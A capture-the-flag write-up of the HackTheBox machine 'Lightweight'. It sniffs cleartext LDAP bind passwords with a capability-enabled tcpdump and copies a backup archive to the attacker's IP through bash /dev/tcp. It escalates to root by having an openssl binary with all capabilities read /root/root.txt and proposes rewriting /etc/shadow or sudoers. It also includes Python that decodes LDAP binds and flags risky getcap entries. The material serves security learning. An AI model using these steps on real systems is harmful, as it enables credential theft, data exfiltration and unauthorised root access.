HackTheBox - Lightweight

Summary

Lightweight, a Linux box created by HackTheBox user 0xEA31, was an overall easy-to-medium difficulty box. It was a fun box that uses Linux capabilities set on tcpdump so we can capture packets on the loopback interface and find credentials in an LDAP session. We then find more credentials in the source code of the web application and finally escalate privileges to root by abusing a copy of the openssl binary that also has Linux capabilities set on it.

Enumeration

nmap Scan

$ nmap -sC -sV 10.10.10.119
# Nmap 7.70 scan initiated Fri Feb 15 08:15:39 2019 as: nmap -sC -sV -oN nmap/light.nmap 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 15 08:16:04 2019 -- 1 IP address (1 host up) scanned in 25.19 seconds

We see that only ports 22, 80 and 389 are open.

Let's open the web page.

Opening user.php, the page tells us that the server lets us in over SSH using our own IP address as both the username and the password.

So let's try to SSH in with that:

ssh 10.10.14.170@10.10.10.119

That gives us a low-privilege shell.

Enumerating from that shell, we find that tcpdump has Linux capabilities set on it, so even as an unprivileged user we can sniff the loopback interface, where the web application talks to the local LDAP server on port 389.

So we set up tcpdump on the box (the LDAP traffic only appears when the web application actually binds to the directory, so browse the site while the capture is running):

tcpdump -i any port 389 or ldap -v -w capture.pcap

Pulling the capture back and going over it with strings, we find the credentials for ldapuser2: the application authenticates with an LDAP simple bind, so the password crosses the loopback interface in cleartext and shows up directly in the output.

strings capture.pcap

The password is 8bc8251332abe1d7f105d3e53ad39ac2.
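To see why strings is enough here, the following added example (mine, not part of the original writeup) decodes LDAP BindRequests from raw bytes, such as the TCP payload pulled out of the capture above. It works on a constructed sample stream rather than on the pcap: the DN uid=ldapuser2,ou=People,dc=lightweight,dc=htb is an assumption, the password is the one found above, and the SASL bind is there only to show that a non-simple bind does not expose a password.

```python
def ber_len(n):
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, content):
    """One BER tag-length-value element."""
    return bytes([tag]) + ber_len(len(content)) + content

def read_tlv(buf, off):
    """Decode the TLV at buf[off]; return (tag, value, offset_after)."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first & 0x80:  # long form: low 7 bits give the number of length octets
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or off + nbytes > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[off:off + nbytes], "big")
        off += nbytes
    else:
        length = first
    if off + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[off:off + length], off + length

def parse_ldap_message(msg):
    """Split an LDAPMessage SEQUENCE body into (messageID, protocolOp tag, op body)."""
    tag, mid, off = read_tlv(msg, 0)
    if tag != 0x02 or not mid:
        raise ValueError("no messageID INTEGER")
    op_tag, op, _ = read_tlv(msg, off)  # optional trailing controls are ignored
    if not 0x60 <= op_tag <= 0x7F:  # protocolOp choices are [APPLICATION n]
        raise ValueError("protocolOp tag out of range")
    return int.from_bytes(mid, "big", signed=True), op_tag, op

def parse_bind_request(message_id, op):
    """BindRequest ::= [APPLICATION 0] SEQUENCE { version, name, authentication }."""
    tag, ver, off = read_tlv(op, 0)
    if tag != 0x02:
        raise ValueError("BindRequest without version")
    tag, name, off = read_tlv(op, off)
    if tag != 0x04:
        raise ValueError("BindRequest without name")
    tag, auth, _ = read_tlv(op, off)
    result = {"message_id": message_id, "version": ver[0],
              "name": name.decode("utf-8", "replace")}
    if tag == 0x80:  # simple [0]: the password itself, in the clear
        result["auth"] = "simple"
        result["password"] = auth.decode("utf-8", "replace")
    elif tag == 0xA3:  # sasl [3]: mechanism name plus opaque credentials
        _, mech, _ = read_tlv(auth, 0)
        result["auth"] = "sasl"
        result["mechanism"] = mech.decode("utf-8", "replace")
    else:
        result["auth"] = "unknown (tag 0x%02x)" % tag
    return result

def find_bind_requests(stream):
    """Scan a byte blob (e.g. reassembled TCP payload) for LDAP BindRequests.
    Decoding is tried at every 0x30 byte so junk is tolerated; a message that
    decodes is skipped whole so its own payload bytes are not re-scanned."""
    found, off = [], 0
    while off < len(stream):
        if stream[off] == 0x30:
            try:
                _, msg, nxt = read_tlv(stream, off)
                mid, op_tag, op = parse_ldap_message(msg)
                if op_tag == 0x60:
                    found.append(parse_bind_request(mid, op))
                off = nxt
                continue
            except ValueError:
                pass
        off += 1
    return found

def build_simple_bind(message_id, dn, password):
    op = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, op))

def build_sasl_bind(message_id, mechanism):
    op = tlv(0x02, b"\x03") + tlv(0x04, b"") + tlv(0xA3, tlv(0x04, mechanism.encode()))
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, op))

# Constructed sample standing in for what tcpdump saw on lo: leading junk, the
# web app's simple bind (assumed DN, the password recovered above), the
# server's bindResponse success, and a SASL bind for contrast. Not captured data.
BIND_RESPONSE_OK = bytes.fromhex("300c02010161070a010004000400")
SAMPLE_STREAM = (
    b"\x00\x00\x30\x05hello"
    + build_simple_bind(1, "uid=ldapuser2,ou=People,dc=lightweight,dc=htb",
                        "8bc8251332abe1d7f105d3e53ad39ac2")
    + BIND_RESPONSE_OK
    + build_sasl_bind(2, "DIGEST-MD5")
)
```

Feed find_bind_requests the reassembled TCP payload of the LDAP stream (for example the hex that tshark -T fields -e tcp.payload prints for capture.pcap, after unhexlifying it): a simple bind comes back with a password key, a SASL bind only with the mechanism name, which is exactly the difference that decides whether strings on the pcap will ever show a credential.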

So let's switch user to ldapuser2:

su ldapuser2

In its home directory we find user.txt, and we have owned user.

Privilege Escalation

In the home directory we also find backup.7z.
We copy it to our local machine; this can be done in several ways, here using bash's /dev/tcp (compare md5sum on both ends afterwards to confirm the transfer is complete):

On local machine: nc -nvlp 9000 > backup.7z
On remote machine: cat backup.7z > /dev/tcp/10.10.14.170/9000

Trying to extract it, we find it is password protected.

Cracking it on lostmypass we find the password is delete. (Offline, 7z2john from John the Ripper jumbo turns the archive into a hash that john or hashcat can run against a wordlist.)

Extracting it and going through the files, we find the password for ldapuser1 in status.php:

f3ca9d298a553da117442deeb6fa932d

So we can switch to ldapuser1 in the SSH session.

Enumerating again as ldapuser1, we find copies of the openssl and tcpdump binaries in the home directory, which is odd.
Check for Linux capabilities on them with:

getcap -r / 2>/dev/null

Our copied openssl shows up in the result as /home/ldapuser1/openssl =ep. That looks like an empty capability set, but in libcap's text format an empty capability list before = means all capabilities, so =ep grants openssl every capability in its permitted and effective sets, including CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE, which bypass file permission checks entirely.
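As an added example (not the writeup's own code), here is a small Python triage of getcap output that parses libcap's text format, so that =ep is reported for what it is rather than as an empty set. The sample lines are constructed: the ping and ldapuser1 entries follow how this box is described above, and /opt/demo/newfmt is a made-up path used only to exercise the newer "path cap_text" layout that recent libcap versions print.

```python
import re

# Capabilities that let whoever can run the binary read or write arbitrary
# files, change identity, or sniff the network. The first two are what turn
# the openssl copy on this box into a root-level file reader and writer.
DANGEROUS = {
    "cap_dac_read_search": "read any file and traverse any directory",
    "cap_dac_override": "write any file, bypassing permission checks",
    "cap_setuid": "switch UID, e.g. to 0",
    "cap_setgid": "switch GID",
    "cap_chown": "change ownership of any file",
    "cap_fowner": "bypass ownership checks (chmod, utime, ...)",
    "cap_sys_admin": "mount, namespaces and many other admin operations",
    "cap_sys_ptrace": "attach to any process",
    "cap_sys_module": "load kernel modules",
    "cap_net_raw": "raw sockets: sniff traffic, as the tcpdump copy does here",
    "cap_net_admin": "interface configuration, promiscuous mode",
}

# One libcap text clause: optional comma-separated names, operator, flags.
# An empty name list (or 'all') means every capability.
CLAUSE = re.compile(r"^([a-z0-9_,]*)([=+-])([eip]*)$")

def _lower(s, caps):
    """Drop caps from set s; the 'ALL' marker clears the whole set."""
    if "ALL" in caps:
        s.clear()
    else:
        s.difference_update(caps)

def parse_cap_text(text):
    """Return (effective, permitted) sets from libcap's textual form.
    'ALL' stands for every capability, so '=ep' gives ({'ALL'}, {'ALL'})."""
    sets = {"e": set(), "p": set(), "i": set()}
    for clause in text.split():
        m = CLAUSE.match(clause)
        if not m:
            raise ValueError("unparseable clause: %r" % clause)
        names, op, flags = m.groups()
        caps = {"ALL"} if names in ("", "all") else set(names.split(","))
        for flag, s in sets.items():
            if op == "=":  # raise the listed flags, lower the unlisted ones
                _lower(s, caps)
                if flag in flags:
                    s.update(caps)
            elif op == "+" and flag in flags:
                s.update(caps)
            elif op == "-" and flag in flags:
                _lower(s, caps)
    return sets["e"], sets["p"]

def triage_getcap(output):
    """Parse `getcap -r /` output and return [(path, risky_caps, why)] for every
    binary whose EFFECTIVE set holds a capability from DANGEROUS. Works for the
    old 'path = cap_text' layout and the newer 'path cap_text' one alike, since
    both put the path first; a path containing spaces is not handled."""
    findings = []
    for line in output.splitlines():
        path, _, cap_text = line.strip().partition(" ")
        if not path:
            continue
        eff, _ = parse_cap_text(cap_text)
        if "ALL" in eff:
            findings.append((path, sorted(DANGEROUS),
                             "'=ep' means EVERY capability is effective: file access as root"))
            continue
        risky = sorted(c for c in eff if c in DANGEROUS)
        if risky:
            findings.append((path, risky, "; ".join(DANGEROUS[c] for c in risky)))
    return findings

# Constructed sample, not real output from the box: CentOS's stock ping (raw
# socket capability only in the permitted set, so not flagged), the two odd
# binaries from ldapuser1's home as described above, and a made-up path using
# the newer libcap layout.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
/opt/demo/newfmt cap_dac_read_search=ep
"""
```

Only the effective set is reported: a capability that is merely permitted (ping above) needs the program itself to raise it before it does anything, whereas +e or =ep means the kernel activates it the moment the binary runs, which is why the openssl and tcpdump copies matter and the stock ping does not.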

So we try to read /root/root.txt using that copy of openssl (the one in the home directory, not the system binary):

./openssl enc -in "/root/root.txt"

With no cipher given, openssl enc just copies its input to stdout, so the file is printed and we have root.txt.

PS: Since openssl enc -out writes files with the same capabilities, we can also get a proper root shell, either by adding ourselves to the sudoers file or by modifying /etc/shadow (read the file out with -in, edit the copy, write it back with -out).

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/lightweight/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.